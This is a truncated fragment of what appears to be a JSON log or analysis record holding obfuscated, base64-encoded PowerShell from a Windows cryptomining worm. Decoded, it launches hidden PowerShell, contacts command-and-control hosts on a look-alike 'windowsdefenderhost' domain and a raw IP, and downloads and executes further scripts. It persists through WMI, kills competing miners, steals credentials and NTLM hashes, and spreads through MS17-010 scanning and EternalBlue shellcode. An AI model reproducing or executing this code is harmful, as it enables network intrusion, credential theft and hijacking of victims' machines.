sAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwB